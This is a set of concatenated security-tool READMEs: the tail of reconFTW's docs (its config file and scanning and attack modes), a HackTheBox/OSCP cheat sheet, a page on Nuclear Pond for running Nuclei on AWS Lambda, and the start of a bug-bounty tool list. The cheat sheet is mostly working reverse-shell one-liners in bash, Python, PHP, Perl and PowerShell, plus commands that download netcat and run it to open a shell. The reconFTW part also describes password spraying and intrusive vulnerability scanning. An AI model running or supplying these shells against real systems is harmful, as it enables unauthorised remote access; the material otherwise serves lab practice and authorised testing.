Ansible Yes! reconFTW can also be easily deployed with Terraform and Ansible to AWS, if you want to know how to do it, you can check the guide [here](Terraform/README.md) # ⚙️ Config file > > You can find a detailed explanation of the configuration file [here](https://github.com/six2dez/reconftw/wiki/3.-Configuration-file) :book: - Through ```reconftw.cfg``` file the whole execution of the tool can be controlled. - Hunters can set various scanning modes, execution preferences, tools, config files, APIs/TOKENS, personalized wordlists and much more. <details> <br><br> <summary> :point_right: Click here to view default config file :point_left: </summary> ```yaml ################################################################# # reconFTW config file # ################################################################# # General values tools=~/Tools # Path installed tools SCRIPTPATH="$( cd "$(dirname "$0")" >/dev/null 2>&1 ; pwd -P )" # Get current script's path profile_shell=".$(basename $(echo $SHELL))rc" # Get current shell profile reconftw_version=$(git rev-parse --abbrev-ref HEAD)-$(git describe --tags) # Fetch current reconftw version generate_resolvers=false # Generate custom resolvers with dnsvalidator update_resolvers=true # Fetch and rewrite resolvers from trickest/resolvers before DNS resolution resolvers_url="https://raw.githubusercontent.com/trickest/resolvers/main/resolvers.txt" resolvers_trusted_url="https://raw.githubusercontent.com/six2dez/resolvers_reconftw/main/resolvers_trusted.txt" fuzzing_remote_list="https://raw.githubusercontent.com/six2dez/OneListForAll/main/onelistforallmicro.txt" # Used to send to axiom(if used) on fuzzing proxy_url="http://127.0.0.1:8080/" # Proxy url install_golang=true # Set it to false if you already have Golang configured and ready upgrade_tools=true #dir_output=/custom/output/path # Golang Vars (Comment or change on your own) export GOROOT=/usr/local/go export GOPATH=$HOME/go export PATH=$GOPATH/bin:$GOROOT/bin:$HOME/.local/bin:$PATH # Tools config files #NOTIFY_CONFIG=~/.config/notify/provider-config.yaml # No need to define AMASS_CONFIG=~/.config/amass/config.ini GITHUB_TOKENS=${tools}/.github_tokens GITLAB_TOKENS=${tools}/.gitlab_tokens SUBGPT_COOKIE=${tools}/subgpt_cookies.json #CUSTOM_CONFIG=custom_config_path.txt # In case you use a custom config file, uncomment this line and set your files path # APIs/TOKENS - Uncomment the lines you want removing the '#' at the beginning of the line #SHODAN_API_KEY="XXXXXXXXXXXXX" #WHOISXML_API="XXXXXXXXXX" #XSS_SERVER="XXXXXXXXXXXXXXXXX" #COLLAB_SERVER="XXXXXXXXXXXXXXXXX" #slack_channel="XXXXXXXX" #slack_auth="xoXX-XXX-XXX-XXX" # File descriptors DEBUG_STD="&>/dev/null" # Skips STD output on installer DEBUG_ERROR="2>/dev/null" # Skips ERR output on installer # Osint OSINT=true # Enable or disable the whole OSINT module GOOGLE_DORKS=true GITHUB_DORKS=true GITHUB_REPOS=true METADATA=true # Fetch metadata from indexed office documents EMAILS=true # Fetch emails from differents sites DOMAIN_INFO=true # whois info REVERSE_WHOIS=true # amass intel reverse whois info, takes some time IP_INFO=true # Reverse IP search, geolocation and whois METAFINDER_LIMIT=20 # Max 250 # Subdomains RUNAMASS=true RUNSUBFINDER=true SUBDOMAINS_GENERAL=true # Enable or disable the whole Subdomains module SUBPASSIVE=true # Passive subdomains search SUBCRT=true # crtsh search SUBNOERROR=true # Check DNS NOERROR response and BF on them SUBANALYTICS=true # Google Analytics search SUBBRUTE=true # DNS bruteforcing SUBSCRAPING=true # Subdomains extraction from web crawling SUBPERMUTE=true # DNS permutations SUBREGEXPERMUTE=true # Permutations by regex analysis SUBGPT=true # Permutations by BingGPT prediction PERMUTATIONS_OPTION=gotator # The alternative is "ripgen" (faster, not deeper) GOTATOR_FLAGS=" -depth 1 -numbers 3 -mindup -adv -md" # Flags for gotator SUBTAKEOVER=false # Check subdomain takeovers, false by default cuz nuclei already check this SUB_RECURSIVE_PASSIVE=false # Uses a lot of API keys queries DEEP_RECURSIVE_PASSIVE=10 # Number of top subdomains for recursion SUB_RECURSIVE_BRUTE=false # Needs big disk space and time to resolve ZONETRANSFER=true # Check zone transfer S3BUCKETS=true # Check S3 buckets misconfigs REVERSE_IP=false # Check reverse IP subdomain search (set True if your target is CIDR/IP) TLS_PORTS="21,22,25,80,110,135,143,261,271,324,443,448,465,563,614,631,636,664,684,695,832,853,854,990,993,989,992,994,995,1129,1131,1184,2083,2087,2089,2096,2221,2252,2376,2381,2478,2479,2482,2484,2679,2762,3077,3078,3183,3191,3220,3269,3306,3410,3424,3471,3496,3509,3529,3539,3535,3660,36611,3713,3747,3766,3864,3885,3995,3896,4031,4036,4062,4064,4081,4083,4116,4335,4336,4536,4590,4740,4843,4849,5443,5007,5061,5321,5349,5671,5783,5868,5986,5989,5990,6209,6251,6443,6513,6514,6619,6697,6771,7202,7443,7673,7674,7677,7775,8243,8443,8991,8989,9089,9295,9318,9443,9444,9614,9802,10161,10162,11751,12013,12109,14143,15002,16995,41230,16993,20003" INSCOPE=false # Uses inscope tool to filter the scope, requires .scope file in reconftw folder # Web detection WEBPROBESIMPLE=true # Web probing on 80/443 WEBPROBEFULL=true # Web probing in a large port list WEBSCREENSHOT=true # Webs screenshooting VIRTUALHOSTS=false # Check virtualhosts by fuzzing HOST header NMAP_WEBPROBE=true # If disabled it will run httpx directly over subdomains list, nmap before web probing is used to increase the speed and avoid repeated requests UNCOMMON_PORTS_WEB="81,300,591,593,832,981,1010,1311,1099,2082,2095,2096,2480,3000,3001,3002,3003,3128,3333,4243,4567,4711,4712,4993,5000,5104,5108,5280,5281,5601,5800,6543,7000,7001,7396,7474,8000,8001,8008,8014,8042,8060,8069,8080,8081,8083,8088,8090,8091,8095,8118,8123,8172,8181,8222,8243,8280,8281,8333,8337,8443,8500,8834,8880,8888,8983,9000,9001,9043,9060,9080,9090,9091,9092,9200,9443,9502,9800,9981,10000,10250,11371,12443,15672,16080,17778,18091,18092,20720,32000,55440,55672" # Host FAVICON=true # Check Favicon domain discovery PORTSCANNER=true # Enable or disable the whole Port scanner module PORTSCAN_PASSIVE=true # Port scanner with Shodan PORTSCAN_ACTIVE=true # Port scanner with nmap CDN_IP=true # Check which IPs belongs to CDN # Web analysis WAF_DETECTION=true # Detect WAFs NUCLEICHECK=true # Enable or disable nuclei NUCLEI_SEVERITY="info,low,medium,high,critical" # Set templates criticity NUCLEI_FLAGS=" -silent -t $HOME/nuclei-templates/ -retries 2" # Additional nuclei extra flags, don't set the severity here but the exclusions like " -etags openssh" NUCLEI_FLAGS_JS=" -silent -tags exposure,token -severity info,low,medium,high,critical" # Additional nuclei extra flags for js secrets URL_CHECK=true # Enable or disable URL collection URL_CHECK_PASSIVE=true # Search for urls, passive methods from Archive, OTX, CommonCrawl, etc URL_CHECK_ACTIVE=true # Search for urls by crawling the websites URL_GF=true # Url patterns classification URL_EXT=true # Returns a list of files divided by extension JSCHECKS=true # JS analysis FUZZ=true # Web fuzzing CMS_SCANNER=true # CMS scanner WORDLIST=true # Wordlist generation ROBOTSWORDLIST=true # Check historic disallow entries on waybackMachine PASSWORD_DICT=true # Generate password dictionary PASSWORD_MIN_LENGTH=5 # Min password lenght PASSWORD_MAX_LENGTH=14 # Max password lenght # Vulns VULNS_GENERAL=false # Enable or disable the vulnerability module (very intrusive and slow) XSS=true # Check for xss with dalfox CORS=true # CORS misconfigs TEST_SSL=true # SSL misconfigs OPEN_REDIRECT=true # Check open redirects SSRF_CHECKS=true # SSRF checks CRLF_CHECKS=true # CRLF checks LFI=true # LFI by fuzzing SSTI=true # SSTI by fuzzing SQLI=true # Check SQLI SQLMAP=true # Check SQLI with sqlmap GHAURI=false # Check SQLI with ghauri BROKENLINKS=true # Check for brokenlinks SPRAY=true # Performs password spraying COMM_INJ=true # Check for command injections with commix PROTO_POLLUTION=true # Check for prototype pollution flaws SMUGGLING=true # Check for HTTP request smuggling flaws WEBCACHE=true # Check for Web Cache issues BYPASSER4XX=true # Check for 4XX bypasses # Extra features NOTIFICATION=false # Notification for every function SOFT_NOTIFICATION=false # Only for start/end DEEP=false # DEEP mode, really slow and don't care about the number of results DEEP_LIMIT=500 # First limit to not run unless you run DEEP DEEP_LIMIT2=1500 # Second limit to not run unless you run DEEP DIFF=false # Diff function, run every module over an already scanned target, printing only new findings (but save everything) REMOVETMP=false # Delete temporary files after execution (to free up space) REMOVELOG=false # Delete logs after execution PROXY=false # Send to proxy the websites found SENDZIPNOTIFY=false # Send to zip the results (over notify) PRESERVE=true # set to true to avoid deleting the .called_fn files on really large scans FFUF_FLAGS=" -mc all -fc 404 -ach -sf -of json" # Ffuf flags HTTPX_FLAGS=" -follow-redirects -random-agent -status-code -silent -title -web-server -tech-detect -location -content-length" # Httpx flags for simple web probing GOWITNESS_FLAGS=" --disable-logging --timeout 5" # HTTP options HEADER="User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0" # Default header # Threads FFUF_THREADS=40 HTTPX_THREADS=50 HTTPX_UNCOMMONPORTS_THREADS=100 KATANA_THREADS=20 BRUTESPRAY_THREADS=20 BRUTESPRAY_CONCURRENCE=10 GAU_THREADS=10 DNSTAKE_THREADS=100 DALFOX_THREADS=200 PUREDNS_PUBLIC_LIMIT=0 # Set between 2000 - 10000 if your router blows up, 0 means unlimited PUREDNS_TRUSTED_LIMIT=400 PUREDNS_WILDCARDTEST_LIMIT=30 PUREDNS_WILDCARDBATCH_LIMIT=1500000 GOWITNESS_THREADS=20 RESOLVE_DOMAINS_THREADS=150 PPFUZZ_THREADS=30 DNSVALIDATOR_THREADS=200 INTERLACE_THREADS=10 TLSX_THREADS=1000 XNLINKFINDER_DEPTH=3 BYP4XX_THREADS=20 # Rate limits HTTPX_RATELIMIT=150 NUCLEI_RATELIMIT=150 FFUF_RATELIMIT=0 # Timeouts AMASS_INTEL_TIMEOUT=15 # Minutes AMASS_ENUM_TIMEOUT=180 # Minutes CMSSCAN_TIMEOUT=3600 # Seconds FFUF_MAXTIME=900 # Seconds HTTPX_TIMEOUT=10 # Seconds HTTPX_UNCOMMONPORTS_TIMEOUT=10 # Seconds PERMUTATIONS_LIMIT=21474836480 # Bytes, default is 20 GB # lists fuzz_wordlist=${tools}/fuzz_wordlist.txt lfi_wordlist=${tools}/lfi_wordlist.txt ssti_wordlist=${tools}/ssti_wordlist.txt subs_wordlist=${tools}/subdomains.txt subs_wordlist_big=${tools}/subdomains_n0kovo_big.txt resolvers=${tools}/resolvers.txt resolvers_trusted=${tools}/resolvers_trusted.txt # Axiom Fleet # Will not start a new fleet if one exist w/ same name and size (or larger) # AXIOM=false Uncomment only to overwrite command line flags AXIOM_FLEET_LAUNCH=true # Enable or disable spin up a new fleet, if false it will use the current fleet with the AXIOM_FLEET_NAME prefix AXIOM_FLEET_NAME="reconFTW" # Fleet's prefix name AXIOM_FLEET_COUNT=10 # Fleet's number AXIOM_FLEET_REGIONS="eu-central" # Fleet's region AXIOM_FLEET_SHUTDOWN=true # # Enable or disable delete the fleet after the execution # This is a script on your reconftw host that might prep things your way... #AXIOM_POST_START="~/Tools/axiom_config.sh" # Useful to send your config files to the fleet AXIOM_EXTRA_ARGS="" # Leave empty if you don't want to add extra arguments #AXIOM_EXTRA_ARGS=" --rm-logs" # Example # TERM COLORS bred='\033[1;31m' bblue='\033[1;34m' bgreen='\033[1;32m' byellow='\033[1;33m' red='\033[0;31m' blue='\033[0;34m' green='\033[0;32m' yellow='\033[0;33m' reset='\033[0m' ``` </details> # Usage > Check out the wiki section to know which flag performs what all steps/attacks [Usage Guide](https://github.com/six2dez/reconftw/wiki/2.-Usage-Guide) :book: ## TARGET OPTIONS | Flag | Description | |------|-------------| | -d | Single Target domain *(example.com)* | | -l | List of targets *(one per line)* | | -m | Multiple domain target *(companyName)* | | -x | Exclude subdomains list *(Out Of Scope)* | | -i | Include subdomains list *(In Scope)* | ## MODE OPTIONS | Flag | Description | |------|-------------| | -r | Recon - Full recon process (without attacks like sqli,ssrf,xss,ssti,lfi etc.) | | -s | Subdomains - Perform only subdomain enumeration, web probing, subdomain takeovers | | -p | Passive - Perform only passive steps | | -a | All - Perform whole recon and all active attacks | | -w | Web - Perform only vulnerability checks/attacks on particular target | | -n | OSINT - Performs an OSINT scan (no subdomain enumeration and attacks) | | -c | Custom - Launches specific function against target | | -h | Help - Show this help menu | ## GENERAL OPTIONS | Flag | Description | |------|-------------| | --deep | Deep scan (Enable some slow options for deeper scan, *vps intended mode*) | | -f | Custom config file path | | -o | Output directory | | -v | Axiom distributed VPS | | -q | Rate limit in requests per second | ## Example Usage **NOTE: this is applicable when you've installed reconFTW on the host (e.g. VM/VPS/cloud) and not in a Docker container.** ### To perform a full recon on single target ```bash ./reconftw.sh -d target.com -r ``` ### To perform a full recon on a list of targets ```bash ./reconftw.sh -l sites.txt -r -o /output/directory/ ``` ### Perform full recon with more time intense tasks *(VPS intended only)* ```bash ./reconftw.sh -d target.com -r --deep -o /output/directory/ ``` ### Perform recon in a multi domain target ```bash ./reconftw.sh -m company -l domains_list.txt -r ``` ### Perform recon with axiom integration ```bash ./reconftw.sh -d target.com -r -v ``` ### Perform all steps (whole recon + all attacks) a.k.a. YOLO mode ```bash ./reconftw.sh -d target.com -a ``` ### Show help section ```bash ./reconftw.sh -h ``` # Axiom Support :cloud: ![](https://i.ibb.co/Jzrgkqt/axiom-readme.png) > Check out the wiki section for more info [Axiom Support](https://github.com/six2dez/reconftw/wiki/5.-Axiom-version) - As reconFTW actively hits the target with a lot of web traffic, hence there was a need to move to Axiom distributing the work load among various instances leading to reduction of execution time. - During the configuration of axiom you need to select `reconftw` as provisoner. - You can create your own axiom's fleet before running reconFTW or let reconFTW to create and destroy it automatically just modifying reconftw.cfg file. # Sample video ![Video](images/reconFTW.gif) # :fire: Features :fire: ## Osint - Domain information ([whois](https://github.com/rfc1036/whois) and [amass](https://github.com/OWASP/Amass)) - Emails addresses and users ([emailfinder](https://github.com/Josue87/EmailFinder)) - Metadata finder ([MetaFinder](https://github.com/Josue87/MetaFinder)) - Google Dorks ([dorks_hunter](https://github.com/six2dez/dorks_hunter)) - Github Dorks ([gitdorks_go](https://github.com/damit5/gitdorks_go)) - GitHub org analysis ([enumerepo](https://github.com/trickest/enumerepo), [trufflehog](https://github.com/trufflesecurity/trufflehog) and [gitleaks](https://github.com/gitleaks/gitleaks)) ## Subdomains - Passive ([amass](https://github.com/OWASP/Amass), [subfinder](https://github.com/projectdiscovery/subfinder) and [github-subdomains](https://github.com/gwen001/github-subdomains)) - Certificate transparency ([crt](https://github.com/cemulus/crt)) - NOERROR subdomain discovery ([dnsx](https://github.com/projectdiscovery/dnsx), more info [here](https://www.securesystems.de/blog/enhancing-subdomain-enumeration-ents-and-noerror/)) - Bruteforce ([puredns](https://github.com/d3mondev/puredns)) - Permutations ([Gotator](https://github.com/Josue87/gotator), [ripgen](https://github.com/resyncgg/ripgen) and [regulator](https://github.com/cramppet/regulator)) - JS files & Source Code Scraping ([katana](https://github.com/projectdiscovery/katana)) - DNS Records ([dnsx](https://github.com/projectdiscovery/dnsx)) - Google Analytics ID ([AnalyticsRelationships](https://github.com/Josue87/AnalyticsRelationships)) - TLS handshake ([tlsx](https://github.com/projectdiscovery/tlsx)) - Recursive search ([dsieve](https://github.com/trickest/dsieve)). - Subdomains takeover ([nuclei](https://github.com/projectdiscovery/nuclei)) - DNS takeover ([dnstake](https://github.com/pwnesia/dnstake)) - DNS Zone Transfer ([dig](https://linux.die.net/man/1/dig)) - Cloud checkers ([S3Scanner](https://github.com/sa7mon/S3Scanner) and [cloud_enum](https://github.com/initstring/cloud_enum)) ## Hosts - IP info ([whoisxmlapi API](https://www.whoisxmlapi.com/)) - CDN checker ([ipcdn](https://github.com/six2dez/ipcdn)) - WAF checker ([wafw00f](https://github.com/EnableSecurity/wafw00f)) - Port Scanner (Active with [nmap](https://github.com/nmap/nmap) and passive with [smap](https://github.com/s0md3v/Smap)) - Port services vulnerability checks ([vulners](https://github.com/vulnersCom/nmap-vulners)) - Password spraying ([brutespray](https://github.com/x90skysn3k/brutespray)) ## Webs - Web Prober ([httpx](https://github.com/projectdiscovery/httpx)) - Web screenshoting ([webscreenshot](https://github.com/maaaaz/webscreenshot) or [gowitness](https://github.com/sensepost/gowitness)) - Web templates scanner ([nuclei](https://github.com/projectdiscovery/nuclei) and [nuclei geeknik](https://github.com/geeknik/the-nuclei-templates.git)) - CMS Scanner ([CMSeeK](https://github.com/Tuhinshubhra/CMSeeK)) - Url extraction ([gau](https://github.com/lc/gau),[waymore](https://github.com/xnl-h4ck3r/waymore), [katana](https://github.com/projectdiscovery/katana), [github-endpoints](https://gist.github.com/six2dez/d1d516b606557526e9a78d7dd49cacd3) and [JSA](https://github.com/w9w/JSA)) - URL patterns Search and filtering ([urless](https://github.com/xnl-h4ck3r/urless), [gf](https://github.com/tomnomnom/gf) and [gf-patterns](https://github.com/1ndianl33t/Gf-Patterns)) - Favicon Real IP ([fav-up](https://github.com/pielco11/fav-up)) - Javascript analysis ([subjs](https://github.com/lc/subjs), [JSA](https://github.com/w9w/JSA), [xnLinkFinder](https://github.com/xnl-h4ck3r/xnLinkFinder), [getjswords](https://github.com/m4ll0k/BBTz), [Mantra](https://github.com/MrEmpy/Mantra)) - Fuzzing ([ffuf](https://github.com/ffuf/ffuf)) - URL sorting by extension - Wordlist generation - Passwords dictionary creation ([pydictor](https://github.com/LandGrey/pydictor)) ## Vulnerability checks - XSS ([dalfox](https://github.com/hahwul/dalfox)) - Open redirect ([Oralyzer](https://github.com/r0075h3ll/Oralyzer)) - SSRF (headers [interactsh](https://github.com/projectdiscovery/interactsh) and param values with [ffuf](https://github.com/ffuf/ffuf)) - CRLF ([crlfuzz](https://github.com/dwisiswant0/crlfuzz)) - Cors ([Corsy](https://github.com/s0md3v/Corsy)) - LFI Checks ([ffuf](https://github.com/ffuf/ffuf)) - SQLi Check ([SQLMap](https://github.com/sqlmapproject/sqlmap) and [ghauri](https://github.com/r0oth3x49/ghauri)) - SSTI ([ffuf](https://github.com/ffuf/ffuf)) - SSL tests ([testssl](https://github.com/drwetter/testssl.sh)) - Broken Links Checker ([katana](https://github.com/projectdiscovery/katana)) - Prototype Pollution ([ppfuzz](https://github.com/dwisiswant0/ppfuzz)) - Web Cache Vulnerabilities ([Web-Cache-Vulnerability-Scanner](https://github.com/Hackmanit/Web-Cache-Vulnerability-Scanner)) - 4XX Bypasser ([byp4xx](https://github.com/lobuhi/byp4xx)) ## Extras - Multithreading ([Interlace](https://github.com/codingo/Interlace)) - Custom resolvers generated list ([dnsvalidator](https://github.com/vortexau/dnsvalidator)) - Docker container included and [DockerHub](https://hub.docker.com/r/six2dez/reconftw) integration - Ansible + Terraform deployment over AWS - Allows IP/CIDR as target - Resume the scan from last performed step - Custom output folder option - All in one installer/updater script compatible with most distros - Diff support for continuous running (cron mode) - Support for targets with multiple domains - Raspberry Pi/ARM support - 6 modes (recon, passive, subdomains, web, osint and all) - Out of Scope Support + optional [inscope](https://github.com/tomnomnom/hacks/tree/master/inscope) support - Notification system with Slack, Discord and Telegram ([notify](https://github.com/projectdiscovery/notify)) and sending zipped results support ## Mindmap/Workflow ![Mindmap](images/mindmap_obsidian.png) ## Data Keep Follow these simple steps to end up with a private repository with your `API Keys` and `/Recon` data. ### Makefile A `Makefile` is provided to quickly bootstrap a private repo. To use it, you'll need the [Github CLI](https://cli.github.com/) installed. Once done, just run: ```bash # below line is optional, the default is ~/reconftw-data export PRIV_REPO="$HOME/reconftw-data" make bootstrap ``` To sync your private repo with upstream: ```bash make sync ``` To upload juicy recon data: ```bash make upload ``` ### Manual - Create a private **blank** repository on `Git(Hub|Lab)` (Take into account size limits regarding Recon data upload) - Clone your project: `git clone https://gitlab.com/example/reconftw-data` - Get inside the cloned repository: `cd reconftw-data` - Create a new branch with an empty commit: `git commit --allow-empty -m "Empty commit"` - Add the official repo as a new remote: `git remote add upstream https://github.com/six2dez/reconftw` (`upstream` is an example) - Update upstream's repo: `git fetch upstream` - Rebase current branch with the official one: `git rebase upstream/main master` ### Main commands - Upload changes to your personal repo: `git add . && git commit -m "Data upload" && git push origin master` - Update tool anytime: `git fetch upstream && git rebase upstream/main master` ## How to contribute If you want to contribute to this project, you can do it in multiple ways: - Submitting an [issue](https://github.com/six2dez/reconftw/issues/new/choose) because you have found a bug or you have any suggestion or request. - Making a Pull Request from [dev](https://github.com/six2dez/reconftw/tree/dev) branch because you want to improve the code or add something to the script. ## Need help? :information_source: - Take a look at the [wiki](https://github.com/six2dez/reconftw/wiki) section. - Check [FAQ](https://github.com/six2dez/reconftw/wiki/7.-FAQs) for commonly asked questions. - Join our [Discord server](https://discord.gg/R5DdXVEdTy) - Ask for help in the [Telegram group](https://t.me/joinchat/TO_R8NYFhhbmI5co) ## Support this project ### Buymeacoffee [<img src="https://cdn.buymeacoffee.com/buttons/v2/default-green.png">](https://www.buymeacoffee.com/six2dez) ### DigitalOcean referral link <a href="https://www.digitalocean.com/?refcode=f362a6e193a1&utm_campaign=Referral_Invite&utm_medium=Referral_Program&utm_source=badge"><img src="https://web-platforms.sfo2.cdn.digitaloceanspaces.com/WWW/Badge%201.svg" alt="DigitalOcean Referral Badge" /></a> ### GitHub sponsorship [Sponsor](https://github.com/sponsors/six2dez) ## Thanks :pray: - Thank you for lending a helping hand towards the development of the project! - [C99](https://api.c99.nl/) - [CIRCL](https://www.circl.lu/) - [NetworksDB](https://networksdb.io/) - [ipinfo](https://ipinfo.io/) - [hackertarget](https://hackertarget.com/) - [Censys](https://censys.io/) - [Fofa](https://fofa.info/) - [intelx](https://intelx.io/) - [Whoxy](https://www.whoxy.com/) ## Disclaimer Usage of this program for attacking targets without consent is illegal. It is the user's responsibility to obey all applicable laws. The developer assumes no liability and is not responsible for any misuse or damage caused by this program. Please use responsibly. The material contained in this repository is licensed under MIT.
# HackTheBox For OSCP preparation! ## CheatSheet * [Reverse shell](#Reverse) * [Powershell Cheatsheet](#PSCheat) * [Metasploit Setup](#Metasploit) ### Bash ```bash bash -i >& /dev/tcp/{IP}}/{PORT}} 0>&1 sh -i >& /dev/udp/{IP}/{PORT}} 0>&1 0<&196;exec 196<>/dev/tcp/<your IP>/<same unfiltered port>; sh <&196 >&196 2>&196 ``` ### Python ```Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.10.10",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")' ``` ### php ```PHP <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.10/1234 0>&1'"); ``` ### Perl ```perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IP]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` ### Powershell ```Powershell Create shell.ps1 $client = New-Object System.Net.Sockets.TCPClient("10.10.10.10",80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() ``` ## PSCheat **One Liner 'Download file with powershell'** ```Download File -Powershell cmd.exe> powershell IWR http://10.12.12.12/nc.exe -outfile \\PATH\\nc.exe PS> Invoke-WebRequest http://10.10.15.15/shell.ps1 -OutFile c:\shell.ps1 ``` **One liner 'PHP Reverse shell when Target machine is Windows'** ``` <?= system("powershell IWR http://10.12.12.12/nc.exe -outfile \\windows\\temp\\nc.exe; \\windows\\temp\\nc.exe 10.12.12.12 4444 -e powershell.exe 2>&1") ?> Start Listerner > nc -lvnp 4444 If reverse shell does not connect -Verify if target machine has AV as it may delete the netcat. ``` **Switch User in Powershell (Like Su user in Linux but in windows its tricky)** ``` PS>$user = 'WORKGROUP\Miracle' PS>$passwd = 'securepass' PS>$secpass = ConvertTo-SecureString $passwd -AsPlainText -Force PS>$cred = new-object system.management.automation.PSCredential $user,$secpass PS>Invoke-Command -computername 127.0.0.1 -ScriptBlock { whoami } -credential $cred ``` *It will print Usernmae WORKGROUP\Miracle because of this { whoami }, Then to get reverse shell use below lines and remember to change the 'Ip' & 'Port'* ``` PS>Invoke-Command -computername 127.0.0.1 -ScriptBlock { wget http://10.10.14.201/nc.exe -OutFile C:\temp\nc.exe } -credential $cred PS>Invoke-Command -computername 127.0.0.1 -ScriptBlock { C:\temp\nc.exe 10.10.14.201 8687 -e powershell.exe } -credential $cred ``` ## Metasploit ``` root@Miracle:~# apt update; apt install metasploit-framework root@Miracle:~# msfdb delete root@Miracle:~# msfdb init root@Miracle:~# cp /usr/share/metasploit-framework/config/database.yml /root/.msf4/ root@Miracle:~# service postgresql restart root@Miracle:~# msfconsole MSF5 > db_status Msf5 > db_rebuild_cache Easy ```
# Nuclear Pond <img src="assets/logo.png" width="400" height="300" align="right"> Nuclear Pond is used to leverage [Nuclei](https://github.com/projectdiscovery/nuclei) in the cloud with unremarkable speed, flexibility, and perform internet wide scans for far less than a cup of coffee. It leverages [AWS Lambda](https://aws.amazon.com/lambda/) as a backend to invoke Nuclei scans in parallel, choice of storing json findings in s3 to query with [AWS Athena](https://aws.amazon.com/athena/), and is easily one of the cheapest ways you can execute scans in the cloud. ## Features - Output results to your terminal, as json, or to an S3 data lake - Specify threads and parallel invocations in any desired number of batches - Specify any Nuclei arguments just like you would locally - Specify a single host or from a file ## Usage Think of Nuclear Pond as just a way for you to run Nuclei in the cloud. You can use it just as you would on your local machine but run them in parallel and with however many hosts you want to specify. All you need to think of is the nuclei command line flags you wish to pass to it. ## Setup & Installation To install Nuclear Pond, you need to configure the backend [terraform module](https://github.com/DevSecOpsDocs/terraform-nuclear-pond). You can do this by running `terraform apply` or by leveraging [terragrunt](https://terragrunt.gruntwork.io/). ```bash $ go install github.com/DevSecOpsDocs/nuclearpond@latest ``` ### Backend Configuration You can either pass in your backend with flags or through environment variables. You can use `-f` or `--function-name` to specify your Lambda function and `-r` or `--region` to the specified region. The environment variables are `AWS_REGION` and `AWS_LAMBDA_FUNCTION_NAME`. ### Command line flags Below are some of the flags you can specify when running `nuclearpond`. The primary flags you need are `-t` or `-l` for your target(s), `-a` for the nuclei args, and `-o` to specify your output. When specifying Nuclei args you must pass them in as base64 encoded strings by performing `-a $(echo -ne "-t dns" | base64)`. ```bash $ nuclearpond run -h Executes nuclei tasks in parallel by invoking lambda asynchronously Usage: nuclearpond run [flags] Flags: -a, --args string nuclei arguments as base64 encoded string -b, --batch-size int batch size to run nuclei in parallel (default 1) -f, --function-name string AWS Lambda function name -h, --help help for run -o, --output string output type to save nuclei results(s3, cmd, or json) (default "cmd") -r, --region string AWS region to run nuclei -s, --silent silent command line output -t, --target string individual target to specify -l, --targets string list of targets in a file -c, --threads int number of threads to run nuclei in parallel (default 1) ``` ## Retrieving Findings If you have specified `s3` as the output, your findings will be located in S3. The fastest way to get at them is to do so with Athena. Assuming you setup the terraform-module as your backend, all you need to do is query them directly through athena. You may have to configure query results if you have not done so already. ```sql select * from nuclei_db.findings_db limit 10; ``` ### Advance Query In order to get down into queries a little deeper, I thought I would give you a quick example. In the select statement we drill down into `info` column, `"matched-at"` column must be in double quotes due to `-` character, and you are searching only for high and critical findings generated by Nuclei. ```sql SELECT info.name, host, type, info.severity, "matched-at", info.description, template, dt FROM "nuclei_db"."findings_db" where host like '%devsecopsdocs.com' and info.severity in ('high','critical') ``` ## Infrastructure The backend infrastructure, all within [terraform module](https://github.com/DevSecOpsDocs/terraform-nuclear-pond). I would strongly recommend reading the readme associated to it as it will have some important notes. - Lambda function - S3 bucket - Stores nuclei binary - Stores configuration files - Stores findings - Glue Database and Table - Allows you to query the findings in S3 - Partitioned by the hour - Partition projection - IAM Role for Lambda Function
# awesome-bbht A bash script that will automatically install a list of bug hunting tools I sometimes use for recon, exploitation, etc. (minus burp.) (Contributions are always welcome.) ## Install ```sh git clone https://github.com/0xApt/awesome-bbht.sh cd awesome-bbht chmod +x awesome-bbht.sh sudo ./awesome-bbht.sh ``` The list of tools downloaded: >awscli ## Subdomain-enum - [aquatone](https://github.com/michenriksen/aquatone) - A Tool for Domain Flyovers - [knockpy](https://github.com/guelfoweb/knock) - Knockpy is a python tool designed to enumerate subdomains on a target domain through a wordlist. - [subbrute](https://github.com/TheRook/subbrute) - A DNS meta-query spider that enumerates DNS records, and subdomains. - [assetfinder](https://github.com/tomnomnom/assetfinder) - Find domains and subdomains related to a given domain - [domain-finder](https://raw.githubusercontent.com/gwen001/pentest-tools/master/domain-finder.py) - [rsdl](https://github.com/tismayil/rsdl) - Subdomain Scan with the Ping Method - [subDomainizer](https://github.com/nsonaniya2010/SubDomainizer) - A tool to find subdomains and interesting things hidden inside, external Javascript files of page, folder, and Github. - [domain_analyzer](https://github.com/eldraco/domain_analyzer) - Analyze the security of any domain by finding all the information possible. Made in python. - [massdns](https://github.com/blechschmidt/massdns) - A high-performance DNS stub resolver for bulk lookups and reconnaissance (subdomain enumeration) - [subfinder](https://github.com/subfinder/subfinder) - Subfinder is a subdomain discovery tool that discovers valid subdomains for websites. Designed as a passive framework to be useful for bug bounties and safe for penetration testing. - [amass](https://github.com/caffix/amass) - In-depth Attack Surface Mapping and Asset Discovery - [sub.sh](https://github.com/cihanmehmet/sub.sh) - Online Subdomain Detect Script - [sublist3r](https://github.com/aboul3la/Sublist3r) - Fast subdomains enumeration tool for penetration testers - [Sudomy](https://github.com/Screetsec/Sudomy) - Sudomy is a subdomain enumeration tool, 